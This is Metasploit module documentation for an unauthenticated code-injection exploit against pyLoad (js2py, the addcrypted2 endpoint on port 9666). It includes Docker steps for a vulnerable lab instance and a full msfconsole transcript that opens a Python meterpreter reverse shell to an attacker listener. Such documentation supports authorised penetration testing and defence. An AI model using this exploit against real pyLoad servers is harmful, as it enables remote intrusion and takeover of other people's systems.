dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/linux/http/pyload_js2py_exec.md

2.2 KiB
Raw Permalink Blame History

Vulnerable Application

pyLoad versions prior to 0.5.0b3.dev31 are vulnerable to Python code injection due to the pyimport functionality exposed through the js2py library. An unauthenticated attacker can issue a crafted POST request to the flash/addcrypted2 endpoint to leverage this for code execution. pyLoad by default runs two services, the primary of which is on port 8000 and can not be used by external hosts. A secondary "Click 'N' Load" service runs on port 9666 and can be used remotely without authentication.

Verification Steps

  1. Start a vulnerable instance of pyLoad using docker
  2. Start msfconsole
  3. Run: use exploit/linux/http/pyload_js2py_exec
  4. Set the RHOST, PAYLOAD and payload associated options
  5. Run: run

Docker Setup

docker run -d \
  --name=pyload-ng \
  -e PUID=1000 \
  -e PGID=1000 \
  -e TZ=Etc/UTC \
  -p 8000:8000 \
  -p 9666:9666 \
  --restart unless-stopped \
  lscr.io/linuxserver/pyload-ng:version-0.5.0b3.dev30

Options

Scenarios

pyLoad 0.5.0b3.dev30 via Docker

msf6 > use exploit/linux/http/pyload_js2py_exec 
[*] Using configured payload cmd/unix/generic
msf6 exploit(linux/http/pyload_js2py_exec) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(linux/http/pyload_js2py_exec) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/pyload_js2py_exec) > set LHOST 192.168.250.134
LHOST => 192.168.250.134
msf6 exploit(linux/http/pyload_js2py_exec) > exploit

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Successfully tested command injection.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (24380 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (192.168.250.134:4444 -> 172.17.0.2:40830) at 2023-02-15 15:28:52 -0500

meterpreter > getuid
Server username: abc
meterpreter > sysinfo
Computer     : f03ec089a4fe
OS           : Linux 6.0.18-200.fc36.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Jan 7 17:08:48 UTC 2023
Architecture : x64
Meterpreter  : python/linux
meterpreter > pwd
/config/data
meterpreter >